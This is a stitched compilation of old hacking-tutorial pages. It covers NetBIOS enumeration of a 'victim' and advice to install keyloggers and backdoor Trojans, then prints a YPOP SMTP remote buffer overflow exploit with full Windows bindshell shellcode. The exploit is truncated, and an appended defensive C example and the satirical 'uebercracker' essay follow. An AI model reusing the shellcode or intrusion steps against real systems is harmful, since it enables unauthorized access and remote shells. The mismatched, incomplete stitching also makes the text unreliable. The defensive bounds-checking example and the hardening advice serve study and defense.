You may replace the letter k by any other letter. If you replace it by "b" (type without quotes) a new drive will be created with drive letter b.

Please note that you won't be able to get access to the victim's shared drives, but you can gather valuable information like the names of all the users, users that have never logged in, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum"; it's my favorite tool, however it runs on the command prompt.


________________________________________________________________________________


Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his mp3 songs, and more...

But if you think like a hard-core hacker you would like to play some dirty tricks: you may wish to install a key logger, install a back-door Trojan like NetBus or Back Orifice, or delete or copy some files. All these tasks involve writing to the victim's hard disk. For this you need to have write access permission.


________________________________________________________________________________
_____________________________

Let's Hack - Part 2: Denial of service attack

This type of attack is meant to be launched by computer techies, because it involves using the Linux operating system and compiling C language files. To exploit these vulnerabilities you have to copy the exploit code from sites like neworder, securityfocus, etc. and compile it.

The two most common vulnerabilities found in NetBIOS are

Vulnerability 1

Vulnerability 2

Another vulnerability that has been found recently is that one can launch a DoS attack against Windows NT, 2000, XP and .NET systems. For detailed information and the patch, please visit this link: http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.



________________________________________________________________________________
______________________________

How to protect yourself

Please visit windowsupdate.microsoft.com and let Windows update itself.

Ypop SMTP Remote Buffer Overflow Exploit

The bug: sending a request of more than 504 bytes overruns the stack buffer, overwriting ESP and causing a stack-based overflow.

Example:
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA

The EIP register will be overwritten and our code will be executed. Here is a little exploit:


/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h =
*-= ---------------------------------- =-
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread

unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"
"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

int fd,bytes;

void usage(char *prog)
{
printf("Usage: %s -h <host> -p <port>\n",prog);
printf("------\n");
printf(" -h <host> e.g (-h 127.0.0.1)\n");
printf(" -p <port> e.g (-p 25)\n");
}

int main(int argc, char *argv[])
{
int arg,port=0,stack,i;
char evilbuf[1024];
char *hostname=NULL;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;

printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");
printf("- - - - - - - - - - - - - - - - - - - - - \n");

if(argc<4) { usage(argv[0]); exit(-1); }

/* option parsing: -h host, -p port */
while((arg=getopt(argc,argv,"h:p:"))!=-1) {
switch(arg) {
case 'h': hostname=optarg; break;
case 'p': port=atoi(optarg); break;
default: usage(argv[0]); exit(-1);
}
}
if(hostname==NULL || port==0) { usage(argv[0]); exit(-1); }

if((he=gethostbyname(hostname))==NULL) {
printf("[-] Can't resolve %s\n",hostname);
exit(-1);
}

if((fd=socket(AF_INET,SOCK_STREAM,0))==-1) {
printf("[-] Can't create socket\n");
exit(-1);
}

client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);

if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);
exit(-1);
}

printf("[+] Connected!\n");

if((bytes=recv(fd,buffer,sizeof(buffer)-1,0)) <= 0)
{
printf("[-] Error Receiving Welcome\n");
exit(-1);
}
buffer[bytes]='\0';
if((strstr(buffer,"220")==NULL) || (strstr(buffer,"YahooPOPs")==NULL)) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");
exit(-1);
}

stack=504-sizeof(shellcode);
memset(evilbuf,0,sizeof(evilbuf));
for(i=0;i<stack;i++) /* the rest of the loop, the payload layout and the send() call did not survive the page's copy */ ;

printf(" -> nc %s %i or\n",hostname,port);
printf(" -> telnet %s %i\n",hostname,port);

}
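Added example (not YPOPs' own source and not part of the exploit above): the bug shape the text describes, a request copied into a fixed 504-byte stack buffer, beside a bounds-checked reader that rejects an overlong line the way the server should have. The 504-byte figure comes from the text; the function names and the probe input are constructed for illustration.

```c
#include <string.h>

#define YPOP_LINE_BUF 504   /* buffer size implied by the 504-byte threshold */

/* Vulnerable shape: nothing checks that the request fits, so a request of
 * 504 bytes or more runs past the buffer into the saved frame and the saved
 * return address (EIP). Shown only to make the defect visible. */
size_t smtp_copy_unsafe(const char *req)
{
    char line[YPOP_LINE_BUF];
    strcpy(line, req);                  /* unbounded copy */
    return strlen(line);
}

/* Hardened reader: copies one CRLF-terminated command into the caller's
 * buffer and returns its length without the CRLF, or -1 if no CRLF is
 * found within the space available (overlong or unterminated line). */
long smtp_read_line(const char *in, size_t inlen, char *out, size_t outsz)
{
    size_t i;
    for (i = 0; i < inlen && i < outsz; i++) {
        if (in[i] == '\r' && i + 1 < inlen && in[i + 1] == '\n') {
            memcpy(out, in, i);
            out[i] = '\0';              /* i <= outsz - 1, so this fits */
            return (long)i;
        }
    }
    return -1;
}

/* Same fixed stack buffer as the vulnerable server, but every byte that
 * lands in it has been length-checked; -1 means "500 line too long". */
long smtp_handle_request(const char *req, size_t reqlen)
{
    char line[YPOP_LINE_BUF];
    long n = smtp_read_line(req, reqlen, line, sizeof line);
    return n < 0 ? -1 : n;              /* verb dispatch would follow here */
}

/* Constructed probe: n bytes of 'A' plus CRLF, like the "504xA" line above. */
long smtp_probe(size_t n)
{
    static char req[1024];
    if (n + 2 > sizeof req) return -2;
    memset(req, 'A', n);
    req[n] = '\r'; req[n + 1] = '\n';
    return smtp_handle_request(req, n + 2);
}
```

A 503-byte command still fits (buffer plus terminator), while the transcript's 504 'A's are refused before they touch the stack buffer.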

How to become a master hacker

This paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks.

Here are the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and can skip past step 3.

Step 3. You may want to buy a Unix manual or book to let you know what ls, cd and cat do.

Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks questions like "Why can't I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer: look around your system for binary programs suid root (look in the Unix manual from step 3 if confused). After finding a suid root binary (i.e. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file (i.e. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be obnoxious on #hack, otherwise people will look down on you and not give you anything.)

Step 11. Hopefully you will now have at least one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other users' mail, even rm log files and whatever tempts you. (Look in the Unix manual from step 3 if confused.)

Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear to come from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff. Remember, YOU are a uebercracker.)

Step 14. Wait a few months and have all your notes, etc. ready in your room for when the FBI, Secret Service, and other law enforcement agencies confiscate your equipment. Call eff.org to complain how you were innocent and how you accidentally got someone else's account and only looked because you were curious. (Whatever else may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker.

Now the next part of the paper is top secret. Please only pass it to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.)

This is broken down into How to Become an UeberAdmin (otherwise known as a security expert) and How to stop Uebercrackers.

Step 1. Read the Unix manual (a good idea for admins).

Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts are among the favorites for getting root by uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on the Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find out if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration goes (i.e. your NFS exports and anon FTP site).

Step 7. If you have done all of the above, you will have stopped 99% of all uebercrackers. Congrads! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is: like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.)

Step 9. Here the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to the Internet. They do not have to post it on Usenet, but share it among many other trusted people, and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches.

Step 10. If you have gained the confidence of enough security experts, you will now be looked up to as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile an IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like "That bug has been known for years, there just aren't any patches for it yet. Here's my fix." and the other half of the replies will be like "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, flame him for discussing it, since it could bring down the Internet and all Uebercrackers will now have it, and the million other reasons to keep everything secret about security.

Well, this paper has shown the finer details of security on the Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on the Internet are the following:

1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure, with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to the Internet. (I believe Uebercracker is German for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you check the mail alias for "security@vendor.com", you will probably find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in manual if confused.)

2. Security experts giving up the attitude that they are above the normal Internet user and trying to give out information that could lead to pressure by other admins on vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread.

3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker.